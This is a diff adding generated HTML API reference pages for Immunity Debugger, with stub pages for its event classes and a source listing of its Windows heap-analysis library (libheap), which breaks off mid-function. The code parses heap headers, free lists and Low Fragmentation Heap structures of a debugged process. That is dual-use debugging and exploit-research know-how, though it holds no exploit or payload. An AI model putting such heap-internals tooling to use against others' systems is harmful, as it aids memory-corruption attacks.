+ Libs.libevent.ExceptionRecord
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class ExceptionRecord
+
+
+
+
+
+
+
+
+Class ExceptionRecord source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ isAccessViolationOnExecute (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isAccessViolationOnWrite (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isAccessViolationOnRead (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ isArrayBoundsExceeded (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ isFltInvalidOperation (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ isNonContinuableException (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isExceptionStackOverflow (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.ExitProcessEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.ExitProcessEvent-class.html
new file mode 100755
index 0000000..4cfc380
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.ExitProcessEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.ExitProcessEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class ExitProcessEvent
+
+
+
+
+
+
+
+
+Class ExitProcessEvent source code
+
+Event --+
+ |
+ ExitProcessEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.ExitThreadEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.ExitThreadEvent-class.html
new file mode 100755
index 0000000..530996d
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.ExitThreadEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.ExitThreadEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class ExitThreadEvent
+
+
+
+
+
+
+
+
+Class ExitThreadEvent source code
+
+Event --+
+ |
+ ExitThreadEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.LoadDLLEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.LoadDLLEvent-class.html
new file mode 100755
index 0000000..04a5a70
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.LoadDLLEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.LoadDLLEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class LoadDLLEvent
+
+
+
+
+
+
+
+
+Class LoadDLLEvent source code
+
+Event --+
+ |
+ LoadDLLEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.OutputDebugEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.OutputDebugEvent-class.html
new file mode 100755
index 0000000..0560436
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.OutputDebugEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.OutputDebugEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class OutputDebugEvent
+
+
+
+
+
+
+
+
+Class OutputDebugEvent source code
+
+Event --+
+ |
+ OutputDebugEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.RIPEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.RIPEvent-class.html
new file mode 100755
index 0000000..d7e1db8
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.RIPEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.RIPEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class RIPEvent
+
+
+
+
+
+
+
+
+Class RIPEvent source code
+
+Event --+
+ |
+ RIPEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.UnloadDLLEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.UnloadDLLEvent-class.html
new file mode 100755
index 0000000..64bae19
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.UnloadDLLEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.UnloadDLLEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class UnloadDLLEvent
+
+
+
+
+
+
+
+
+Class UnloadDLLEvent source code
+
+Event --+
+ |
+ UnloadDLLEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap-module.html b/1.73/Documentation/Ref/Libs.libheap-module.html
new file mode 100755
index 0000000..cd86b78
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap-module.html
@@ -0,0 +1,289 @@
+
+
+
+
+ Libs.libheap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap
+
+
+
+
+
+
+
+
+Module libheap source code
+Immunity Heap API for Immunity Debugger
+ (c) Immunity, Inc. 2004-2006
+ Immunity Inc.
+ Debugger Heap Library for python
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.3'
+
+
+
+
+
+ HEAP_MAX_FREELIST = 128
+
+
+
+
+
+
+ SHOWCHUNK_FULL = 1
+
+
+
+
+
+
+ CHUNK_ANALIZE = 2
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap-pysrc.html b/1.73/Documentation/Ref/Libs.libheap-pysrc.html
new file mode 100755
index 0000000..9773a22
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap-pysrc.html
@@ -0,0 +1,1443 @@
+
+
+
+
+ Libs.libheap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 Immunity Heap API for Immunity Debugger 4 5 (c) Immunity, Inc. 2004-2006 6 7 8 U{Immunity Inc.<http://www.immunityinc.com>} Debugger Heap Library for python 9 10 11 """ 12
+ 13 __VERSION__ = '1.3' 14
+ 15 import immutils 16 import struct 17 import string 18 from UserList import UserList 19 HEAP_MAX_FREELIST = 0x80 20
+ 21
+ 22
+
24 - def __init__ ( self , imm , heapddr = 0 , restore = False ) :
+
25 """
+
26 Windows 32 Heap Class
+
27
+
28 @rtype: PHEAP object
+
29 """
+
30 self . imm = imm
+
31 self . address = heapddr
+
32 self . chunks = [ ]
+
33 self . restore = restore
+
34 self . Segments = [ ]
+
35 if heapddr :
+
36 self . _grabHeap ( )
+
37
+
38
+
39
+
41 try :
+
42 heaps = self . imm . readMemory ( self . address , 0x588 )
+
43 except WindowsError , msg :
+
44 raise Exception , "Failed to get heap at address : 0x%08x" % heapaddr
+
45
+
46 index = 0x8
+
47 ( self . Signature , self . Flags , self . ForceFlags , self . VirtualMemoryThreshold , \
+
48 self . SegmentReserve , self . SegmentCommit , self . DeCommitFreeBlockThreshold , self . DeCommitTotalBlockThreshold , \
+
49 self . TotalFreeSize , self . MaximumAllocationSize , self . ProcessHeapListIndex , self . HeaderValidateLength , \
+
50 self . HeaderValidateCopy , self . NextAvailableTagIndex , self . MaximumTagIndex , self . TagEntries , \
+
51 self . UCRSegments , self . UnusedUnCommittedRanges , self . AlignRound , self . AlignMask ) = \
+
52 struct . unpack ( "LLLLLLLLLLHHLHHLLLLL" , heaps [ index : index + ( 0x50 - 8 ) ] )
+
53
+
54 index += 0x50 - 8
+
55 self . VirtualAllocedBlock = struct . unpack ( "LL" , heaps [ index : index + 8 ] )
+
56 index += 8
+
57 self . _Segments = struct . unpack ( "L" * 64 , heaps [ index : index + 64 * 4 ] )
+
58 index += 64 * 4
+
59 self . FreeListInUseLong = struct . unpack ( "LLLL" , heaps [ index : index + 16 ] )
+
60 index += 16
+
61 ( self . FreeListInUseTerminate , self . AllocatorBackTraceIndex ) = struct . unpack ( "HH" , heaps [ index : index + 4 ] )
+
62 index += 4
+
63 self . Reserved1 = struct . unpack ( "LL" , heaps [ index : index + 8 ] )
+
64 index += 8
+
65 self . PseudoTagEntries = struct . unpack ( "L" , heaps [ index : index + 4 ] )
+
66 index += 4
+
67 self . FreeList = [ ]
+
68
+
69
+
70 for a in range ( 0 , 128 ) :
+
71 free_entry = [ ]
+
72
+
73 ( prev , next ) = struct . unpack ( "LL" , heaps [ index + a * 8 : index + a * 8 + 8 ] )
+
74
+
75 free_entry . append ( ( self . address + index + a * 8 , prev , next ) )
+
76 base_entry = self . address + index + a * 8
+
77
+
78
+
79 while next != base_entry :
+
80 tmp = next
+
81 try :
+
82 ( prev , next ) = struct . unpack ( "LL" , self . imm . readMemory ( next , 0x8 ) )
+
83 except :
+
84 break
+
85
+
86 free_entry . append ( ( tmp , prev , next ) )
+
87
+
88 self . FreeList . append ( free_entry )
+
89
+
90 index += 256 * 4
+
91 ( self . LockVariable , self . CommitRoutine , self . Lookaside , self . LookasideLockCount ) = \
+
92 struct . unpack ( "LLLL" , heaps [ index : index + 16 ] )
+
93
+
94
+
95
+
96 for a in range ( 0 , 64 ) :
+
97 if self . _Segments [ a ] == 0x0 :
+
98 break
+
99 s = Segment ( self . imm , self . _Segments [ a ] )
+
100 self . Segments . append ( s )
+
101
+
102
+
103 if self . restore :
+
104 self . getRestoredChunks ( s . BaseAddress )
+
105 else :
+
106 self . getChunks ( s . BaseAddress )
+
107 for idx in s . Pages :
+
108 self . imm . Log ( "> 0x%08x" % idx )
+
109 if self . restore :
+
110 self . getRestoredChunks ( idx )
+
111 else :
+
112 self . getChunks ( idx )
+
113
+
115 """
+
116 Print the Heap's FreeListInUse bitmask
+
117
+
118 @type uselog: Log Function
+
119 @param uselog: (Optional, Def: Log Window) Log function that display the information
+
120 """
+
121 tbl = [ "FreeListInUse %s %s" % ( immutils . decimal2binary ( self . FreeListInUseLong [ 0 ] ) , immutils . decimal2binary ( self . FreeListInUseLong [ 1 ] ) ) , \
+
122 " %s %s" % ( immutils . decimal2binary ( self . FreeListInUseLong [ 2 ] ) , immutils . decimal2binary ( self . FreeListInUseLong [ 3 ] ) ) ]
+
123 if uselog :
+
124 for a in tbl :
+
125 uselog ( a )
+
126 return tbl
+
127
+
129 """
+
130 Print the Heap's FreeList
+
131
+
132 @type uselog: Log Function
+
133 @param uselog: (Optional, Def: Log Window) Log function that display the information
+
134 """
+
135 log = self . imm . Log
+
136 if uselog :
+
137 log = uselog
+
138 for a in range ( 0 , 128 ) :
+
139 entry = self . FreeList [ a ]
+
140 e = entry [ 0 ]
+
141
+
142 log ( "[%03x] 0x%08x -> [ 0x%08x | 0x%08x ] " % ( a , e [ 0 ] , e [ 1 ] , e [ 2 ] ) , address = e [ 0 ] )
+
143 for e in entry [ 1 : ] :
+
144 try :
+
145 sz = self . get_chunk ( e [ 0 ] - 8 ) . size
+
146 except :
+
147 sz = 0
+
148 log ( " 0x%08x -> [ 0x%08x | 0x%08x ] (%08x)" % ( e [ 0 ] , e [ 1 ] , e [ 2 ] , sz ) , address = e [ 0 ] )
+
149 return 0x0
+
150
+
151
+
153 """
+
154 Enumerate Chunks of the current heap using a restore heap
+
155
+
156 @type address: DWORD
+
157 @param address: Address where to start getting chunks
+
158
+
159 @rtype: List of win32heapchunks
+
160 @return: Chunks
+
161 """
+
162
+
163 imm = self . imm
+
164
+
165 oldheap = imm . getKnowledge ( "saved_heap_%08x" % self . address )
+
166 if not oldheap :
+
167 imm . Log ( "Coudln't use restore mode: No saved Heap" )
+
168 return self . getChunks ( address )
+
169
+
170 ptr = address
+
171
+
172 backchunk = self . get_chunk ( imm , ptr , self . address )
+
173
+
174 backchunk . size = backchunk . psize
+
175 backchunk . usize = backchunk . upsize
+
176
+
177 while 1 :
+
178
+
179 try :
+
180 c = self . get_chunk ( imm , ptr , self . address )
+
181 except :
+
182 return self . chunks
+
183
+
184
+
185 next = ptr + c . usize
+
186
+
187 try :
+
188 sizes = imm . readLong ( next )
+
189 previous = ( sizes >> 16 ) & 0xffff
+
190 except Exception :
+
191 previous = 0
+
192
+
193
+
194
+
195
+
196
+
197
+
198
+
199 if ( not c . size ) or ( c . size != previous and not c . istop ( ) ) or ( not previous and not c . istop ( ) ) or ( backchunk . size != c . psize ) :
+
200 restoredchunk = oldheap . findChunkByAddress ( ptr )
+
201
+
202 if restoredchunk :
+
203 c = restoredchunk
+
204 c . setRestored ( )
+
205 next = ptr + c . usize
+
206 ptr = next
+
207 self . chunks . append ( c )
+
208 backchunk = c
+
209
+
210
+
211 if c . istop ( ) or c . size == 0 :
+
212 break
+
213
+
214 backchunk = c
+
215
+
216 return self . chunks
+
217
+
219 """
+
220 Find a Chunks by its address
+
221
+
222 @type address: DWORD
+
223 @param address: Address to search for
+
224
+
225 @rtype: win32heapchunks
+
226 @return: Chunk
+
227 """
+
228
+
229 for a in self . chunks :
+
230 if a . addr == addr :
+
231 return a
+
232 return None
+
233
+
234 - def getChunks ( self , address , size = 0xffffffffL ) :
+
235 """
+
236 Enumerate Chunks of the current heap
+
237
+
238 @type address: DWORD
+
239 @param address: Address where to start getting chunks
+
240
+
241 @type size: DWORD
+
242 @param size: (Optional, Def: All) Amount of chunks
+
243
+
244 @rtype: List of win32heapchunks
+
245 @return: Chunks
+
246 """
+
247 imm = self . imm
+
248
+
249 ptr = address
+
250
+
251 while size :
+
252
+
253 try :
+
254 c = self . get_chunk ( ptr )
+
255 except Exception , msg :
+
256 imm . Log ( "Failed to grab chunks> " + str ( msg ) )
+
257 return self . chunks
+
258
+
259 self . chunks . append ( c )
+
260
+
261
+
262 ptr += c . usize
+
263 if c . istop ( ) or c . size == 0 :
+
264 break
+
265 size -= 1
+
266
+
267 return self . chunks
+
268
+
270 return win32heapchunk ( self . imm , addr , self )
+
271
+
274 self . address = addr
+
275 addr += 8
+
276 mem = imm . readMemory ( addr , 0x34 )
+
277
+
278 ( self . Signature , self . Flags , self . Heap , self . LargestUnCommitedRange , self . BaseAddress , \
+
279 self . NumberOfPages , self . FirstEntry , self . LastValidEntry , self . NumberOfUnCommittedPages , \
+
280 self . NumberOfUnCommittedRanges , self . UnCommittedRanges , self . AllocatorBackTraceIndex , \
+
281 self . Reserved , self . LastEntryInSegment ) = struct . unpack ( "LLLLLLLLLLLHHL" , mem )
+
282
+
283
+
284
+
285
+
286 self . Pages = [ ]
+
287 if self . UnCommittedRanges :
+
288 i = 0
+
289 addr = self . UnCommittedRanges
+
290 while addr != 0 :
+
291 mem = imm . readMemory ( addr , 0x10 )
+
292 ( C_Next , C_Addr , C_Size , C_Filler ) = struct . unpack ( "LLLL" , mem )
+
293
+
294 self . Pages . append ( C_Addr + C_Size )
+
295 addr = C_Next
+
296
+
298 - def __init__ ( self , imm , heapddr = 0 , restore = False ) :
+
300
+
302 try :
+
303 heapmem = self . imm . readMemory ( self . address + 8 , 0x120 )
+
304 except WindowsError , msg :
+
305 raise Exception , "Failed to get heap at address : 0x%08x" % heapaddr
+
306 index = 8
+
307 ( self . SegmentSignature , self . SegmentFlags , self . SegmentListEntry_Flink , self . SegmentListEntry_Blink , self . Heap , self . BaseAddress , self . NumberOfPages , self . FirstEntry , self . LastValidEntry , self . NumberofUncommitedPages , self . NumberofUncommitedRanges , self . SegmentAllocatorBackTraceIndex , self . Reserved , self . UCRSegmentList_Flink , self . UCRSegmentList_Blink , self . Flags , self . ForceFlags , self . CompatibilityFlags , self . EncodeFlagMask , self . EncodingKey , self . EncodingKey2 , self . PointerKey , self . Interceptor_debug , self . VirtualMemoryThreshold , self . Signature , self . SegmentReserve , self . SegmentCommit , self . DeCommitThresholdBlock , self . DeCommitThresholdTotal , self . TotalFreeSize , self . MaxAllocationSize , self . ProcessHeapsListIndex , self . HeaderValidateLength , self . HeaderValidateCopy , self . NextAvailableTagIndex , self . MaximumTagIndex , self . TagEntries , self . UCRList_Flink , self . UCRList_Blink , self . AlignRound , self . AlignMask , self . VirtualAlloc_Flink , self . VirtualAlloc_Blink , self . SegmentList_Flink , self . SegmentList_Blink , self . AllocatorBackTraceIndex , self . NonDedicatedListLenght , self . BlocksIndex , self . UCRIndex , self . PseudoTagEntries , self . FreeList_Flink , self . FreeList_Blink , self . LockVariable , self . CommitRoutine , self . FrontEndHeap , self . FrontHeapLockCount , self . FrontEndHeapType , self . TotalMemoryReserved , self . TotalMemoryCommited , self . TotalMemoryLargeUCR , self . TotalSizeInVirtualBlocks , self . TotalSegments , self . TotalUCRs , self . CommitOps , self . DecommitOps , self . LockAcquires , self . LockCollisions , self . CommitRate , self . DeCommitRate , self . CommitFailures , self . InBlockCommitFailures , self . CompactHeapCalls , self . CompactedUCRs , self . InBlockDecommits , self . InBlockDecommitSize , self . TunningParameters ) = struct . unpack ( "L" * 11 + "HH" + "L" * 18 + "HHLHH" + "L" * 19 + "HH" + "L" * 19 , heapmem )
+
308
+
309 self . imm . Log ( "FreeList: 0x%08x | 0x%08x" % ( self . FreeList_Flink , self . FreeList_Blink ) )
+
310 head = self . address + 0x10
+
311 addr = self . SegmentList_Blink
+
312 self . Segments . append ( self . address )
+
313 self . getChunks ( self . address )
+
314 self . imm . Log ( "segment: 0x%08x 0x%08x" % ( self . SegmentList_Flink , self . SegmentList_Blink ) )
+
315 while head != addr :
+
316 self . Segments . append ( addr - 0x10 )
+
317 self . getChunks ( addr - 0x10 )
+
318 addr = self . imm . readLong ( addr )
+
319
+
320
+
321
+
322 self . getBlocks ( self . BlocksIndex )
+
323 if self . FrontEndHeap :
+
324 self . LFH = LFHeap ( self . imm , self . FrontEndHeap )
+
325
+
327 self . blocks = [ ]
+
328 addr = startaddr
+
329
+
330 while addr :
+
331 block = Blocks ( self . imm , addr )
+
332 self . blocks . append ( block )
+
333 block . FreeList = [ ]
+
334 memory = self . imm . readMemory ( block . Buckets , 0x80 * 8 )
+
335 if block . FreeListInUsePtr :
+
336 block . setFreeListInUse ( struct . unpack ( "LLLL" , self . imm . readMemory ( block . FreeListInUsePtr , 4 * 4 ) ) )
+
337
+
338
+
339 for a in range ( 0 , 128 ) :
+
340 free_entry = [ ]
+
341
+
342 ( fwlink , heap_bucket ) = struct . unpack ( "LL" , memory [ a * 8 : a * 8 + 8 ] )
+
343 if fwlink :
+
344 try :
+
345 ( next , prev ) = struct . unpack ( "LL" , self . imm . readMemory ( fwlink , 8 ) )
+
346 except :
+
347 next , prev = ( 0 , 0 )
+
348 self . imm . Log ( "Error with 0x%x" % fwlink )
+
349 free_entry . append ( ( fwlink , next , prev ) )
+
350 base_entry = fwlink
+
351
+
352 while next and next != base_entry :
+
353 tmp = next
+
354 chunk = win32vistaheapchunk ( self . imm , next - 8 , self )
+
355
+
356 if a == 127 :
+
357 if chunk . size <= a :
+
358 break
+
359 else :
+
360 if chunk . size != a :
+
361 break
+
362
+
363 next = chunk . nextchunk
+
364 free_entry . append ( ( tmp , chunk . nextchunk , chunk . prevchunk ) )
+
365
+
366 else :
+
367 free_entry = [ ( fwlink , 0x0 , 0x0 ) ]
+
368
+
369
+
370
+
371 block . FreeList . append ( free_entry )
+
372
+
373 addr = block . FwLink
+
374
+
376 return win32vistaheapchunk ( self . imm , addr , self )
+
377
+
379 """
+
380 Print the Heap's FreeList
+
381
+
382 @type uselog: Log Function
+
383 @param uselog: (Optional, Def: Log Window) Log function that display the information
+
384 """
+
385 log = self . imm . Log
+
386 if uselog :
+
387 log = uselog
+
388 for block in self . blocks :
+
389 f = block . FreeListInUse
+
390 log ( "** Block 0x%08x StartSize: %d MaxSize: %d CtrZone: %d **" % ( block . address , block . StartSize , block . MaxSize , block . CtrZone ) )
+
391 log ( "FreeListInUse: %s %s" % ( immutils . decimal2binary ( f [ 0 ] ) , \
+
392 immutils . decimal2binary ( f [ 1 ] ) ) )
+
393 log ( " %s %s" % ( immutils . decimal2binary ( f [ 2 ] ) , \
+
394 immutils . decimal2binary ( f [ 3 ] ) ) )
+
395
+
396 for a in range ( 0 , 128 ) :
+
397 entry = block . FreeList [ a ]
+
398 e = entry [ 0 ]
+
399 if e [ 0 ] :
+
400 log ( "[%03d] 0x%08x -> [ 0x%08x | 0x%08x ] " % ( a , e [ 0 ] , e [ 1 ] , e [ 2 ] ) , address = e [ 0 ] )
+
401 for e in entry [ 1 : ] :
+
402 log ( " 0x%08x -> [ 0x%08x | 0x%08x ] " % ( e [ 0 ] , e [ 1 ] , e [ 2 ] ) , address = e [ 0 ] )
+
403 return 0x0
+
404
+405
+
408 mem = imm . readMemory ( addr , 0x300 )
+
409 if not mem :
+
410 raise Exception , "Can't read Low Fragmentation Heap at 0x%08x" % addr
+
411 index = 0
+
412 self . address = addr
+
413 imm . Log ( "Low Fragmented Heap: 0x%08x" % addr )
+
414 ( self . Lock , self . field_4 , self . field_8 , self . field_c , \
+
415 self . field_10 , field_14 , self . SubSegmentZone_Flink ,
+
416 self . SubSegmentZone_Blink , self . ZoneBlockSize , \
+
417 self . Heap , self . SegmentChange , self . SegmentCreate , \
+
418 self . SegmentInsertInFree , self . SegmentDelete , self . CacheAllocs , \
+
419 self . CacheFrees ) = struct . unpack ( "L" * 0x10 , mem [ index : index + 0x40 ] )
+
420 index += 0x40
+
421 self . UserBlockCache = [ ]
+
422 for a in range ( 0 , 12 ) :
+
423 umc = UserMemoryCache ( addr + index , mem [ index : index + 0x10 ] )
+
424 index += 0x10
+
425 self . UserBlockCache . append ( umc )
+
426 self . Buckets = [ ]
+
427 for a in range ( 0 , 128 ) :
+
428 entry = mem [ index : index + 4 ]
+
429 b = Bucket ( addr + index , entry )
+
430 index = index + 4
+
431 self . Buckets . append ( b )
+
432
+
433 self . LocalData = LocalData ( imm , addr + index )
+
434
+
437 self . address = addr
+
438
+
439 mem = imm . readMemory ( addr , 0x18 + 0x68 * 128 )
+
440 ( self . Next , self . Depth , self . Seq , self . CtrZone , self . LowFragHeap , \
+
441 self . Sequence1 , self . Sequence2 ) = struct . unpack ( "LHHLLLL" , mem [ : 0x18 ] )
+
442 index = 0x18
+
443 self . SegmentInfo = [ ]
+
444 for a in range ( 0 , 128 ) :
+
445 l = LocalSegmentInfo ( imm , self . address + index , \
+
446 mem [ index : index + 0x68 ] )
+
447 index += 0x68
+
448 self . SegmentInfo . append ( l )
+
449
+450
+
452 - def __init__ ( self , imm , addr , mem = "" ) :
+
453 self . address = addr
+
454 self . SubSegment = [ ]
+
455 self . imm = imm
+
456 if not mem :
+
457 mem = imm . readMemory ( self . address , 0x68 )
+
458
+
459 ( self . Hint , self . ActiveSubsegment ) = struct . unpack ( "LL" , mem [ 0 : 8 ] )
+
460 index = 8
+
461 self . CachedItems = struct . unpack ( "L" * 0x10 , mem [ index : index + 0x10 * 4 ] )
+
462 index += 0x10 * 4
+
463 ( self . Next , self . Depth , self . Seq , self . TotalBlocks , \
+
464 self . SubSegmentCounts , self . LocalData , self . LastOpSequence , \
+
465 self . BucketIndex , self . LastUsed , self . Reserved ) = struct . unpack ( "LHHLLLLHHL" , mem [ index : index + 0x20 ] )
+
466
+
467 if self . Hint :
+
468 self . SubSegment . append ( self . getSubSegment ( self . Hint , "Hint" ) )
+
469 if self . ActiveSubsegment and self . ActiveSubsegment != self . Hint :
+
470 self . SubSegment . append ( self . getSubSegment ( self . ActiveSubsegment , "ActiveSS" ) )
+
471 for a in range ( 0 , len ( self . CachedItems ) ) :
+
472 item = self . CachedItems [ a ]
+
473 if item and item not in ( self . Hint , self . ActiveSubsegment ) :
+
474 self . SubSegment . append ( self . getSubSegment ( item , "Cache_%02x" % a ) )
+
475
+
476
+
477
+
480
+
482 - def __init__ ( self , imm , address , type = "" ) :
+
483 self . address = address
+
484 self . type = type
+
485 self . chunks = [ ]
+
486 mem = imm . readMemory ( address , 0x20 )
+
487 ( self . LocalInfo , self . UserBlocks , self . AggregateExchg , \
+
488 self . Aggregate_Sequence , self . BlockSize , self . Flags , \
+
489 self . BlockCount , self . SizeIndex , self . AffinityIndex ,
+
490 self . Next , self . Lock ) = struct . unpack ( "LLLLHHHBBLL" , mem )
+
491 self . Offset = self . AggregateExchg >> 0xD
+
492 self . Offset = self . Offset & 0x7FFF8
+
493 self . Depth = self . AggregateExchg & 0xFFFF
+
494
+
495 if self . UserBlocks :
+
496 self . UserDataHeader = self . getUserData ( imm , self . UserBlocks )
+
497
+
498
+
499 list = self . grabBusyList ( imm , self . UserBlocks , self . Offset , self . Depth )
+
500 self . chunks = self . getChunks ( imm , self . UserBlocks + self . UserDataHeader . getSize ( ) , list )
+
501
+
503 list = { }
+
504 i = 1
+
505 for a in range ( 0 , depth ) :
+
506 address = base_addr + offset
+
507 dword = imm . readLong ( address + 8 )
+
508 offset = dword & 0xFFFF
+
509 offset *= 8
+
510 list [ address ] = a + 1
+
511 return list
+
512
+
515
+
517
+
518 addr = address
+
519 chunks = [ ]
+
520 for a in range ( 0 , self . BlockCount ) :
+
521 c = win32vistaheapchunk ( imm , addr , BlockSize = self . BlockSize )
+
522 s = "B"
+
523 if list . has_key ( addr ) :
+
524 c . setFreeOrder ( list [ addr ] )
+
525 s = "F(%02d)" % list [ addr ]
+
526
+
527 addr += self . BlockSize * 8
+
528 chunks . append ( c )
+
529 return chunks
+
530
+
533 self . address = addr
+
534 mem = imm . readMemory ( addr , 0x10 )
+
535 ( self . SubSegment , self . Reserved , self . SizeIndex , self . Signature ) = \
+
536 struct . unpack ( "LLLL" , mem )
+
539
+
542 self . address = addr
+
543 ( self . BlockUnits , self . SizeIndex , Flag ) = \
+
544 struct . unpack ( "HBB" , mem [ : 4 ] )
+
545
+
546 self . UseAffinity = Flag & 0x1
+
547 self . DebugFlags = ( Flag > 1 ) & 0x3
+
548
+
551 self . address = addr
+
552 ( self . Next , self . Depth , self . Sequence , self . AvailableBlocks , \
+
553 self . Reserved ) = struct . unpack ( "LHHLL" , mem [ 0 : 16 ] )
+
554
+
557 mem = imm . readMemory ( addr , 0x24 )
+
558 if not mem :
+
559 raise Exception , "Can't read Block at 0x%08x" % addr
+
560 self . address = addr
+
561 self . FreeListInUse = None
+
562 self . FreeList = [ ]
+
563 ( self . FwLink , self . MaxSize , self . CtrZone , self . field_c ,
+
564 self . field_10 , self . StartSize , self . FreeListPtr , \
+
565 self . FreeListInUsePtr , self . Buckets ) = \
+
566 struct . unpack ( "L" * 9 , mem )
+
568 self . FreeListInUse = inuse
+
569
+
571 self . FreeList = flist
+
572
+573 SHOWCHUNK_FULL = 0x1 574 CHUNK_ANALIZE = 0x2
576 FLAGS = { 'EXTRA PRESENT' : ( 'E' , 0x2 ) , 'FILL PATTERN' : ( 'FP' , 0x4 ) , \
+
577 'VIRTUAL ALLOC' : ( 'V' , 0x8 ) , 'TOP' : ( 'T' , 0x10 ) ,
+
578 'FFU1' : ( 'FFU1' , 0x20 ) , 'FFU2' : ( 'FFU2' , 0x40 ) , \
+
579 'NO COALESCE' : ( 'NC' , 0x80 ) }
+
580 BUSY = ( 'BUSY' , ( 'B' , 0x1 ) )
+
581 - def __init__ ( self , imm , addr , heap = None ) :
+
582 """ Win32 Chunk """
+
583 self . imm = imm
+
584
+
585 self . restored = False
+
586
+
587 if heap :
+
588 self . heap_addr = heap . address
+
589 else :
+
590 self . heap_addr = 0
+
591 self . nextchunk = 0
+
592 self . prevchunk = 0
+
593 self . addr = addr
+
594
+
595 try :
+
596 dword1 = self . imm . readLong ( addr )
+
597 dword2 = self . imm . readLong ( addr + 4 )
+
598 except Exception :
+
